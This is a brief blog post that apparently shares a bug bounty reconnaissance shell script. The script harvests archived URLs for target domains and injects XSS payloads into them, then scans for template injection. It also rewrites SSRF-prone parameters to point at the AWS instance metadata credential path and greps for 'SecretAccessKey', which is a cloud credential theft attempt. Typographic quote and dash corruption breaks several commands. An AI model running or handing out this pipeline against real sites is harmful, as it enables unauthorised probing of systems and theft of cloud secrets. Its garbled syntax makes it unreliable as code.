Bug Bounty Recon

vvek
1 min readApr 23, 2021

--

#!/bin/sh
filename=$1
while read url; do

cd Reconway
mkdir $url
cd $url
touch $url-waygau
cd
echo “==================WAYBACK and GAU::)====================”
waybackurls $url|tee $url-waygau
gau $url|tee -a $url-waygau
cat $url-waygau.txt|grep “=”|qsreplace test|sort -u $url-waygau -o $url-waygau

echo “==================CHECKING XSS FIRST::)====================”
cat $url-waygau|gf xss|qsreplace ‘“><script>confirm(1)</script>’|while read host ;
do curl — silent — path-as-is — insecure “$host”|grep -qs “<script>confirm(1)”&&echo -e “$host \033[0;31mXSS Vulnerable\n” \e[0m”; done

echo “==================CHECKING XSS with kxss and dafox pipe(..::)====================”
cat $url-waygau|kxss|tee $url-kxss.txt
cat $url-kxss.txt|sed ‘s/=.*/=/’|sed ‘s/URL: //’|dalfox pipe

echo “=====================SSRF CHECKING::)=================”
cat $url-waygau|gf ssrf|qsreplace callback-ip#ngrok address adding

cat $url-waygau|gf ssrf|qsreplace “=//169.254.169.254/latest/meta-data/iam/security-credentials/flaws/
“|httpx -match-regex “SecretAccessKey:” -mc 200

echo “===================TEMPLATE INJECTION ================”
cat $url-waygau|grep “=”|qsreplace “kingofbounty{{9*9}}”|httpx -match-regex “kingofbounty{81}” -mc 200 (SSTI)

done < $filename

This is inspired from ofjaah oneliners,Harsha bothra scripts and others on twitter&Make sure you installed requirements

--

--

No responses yet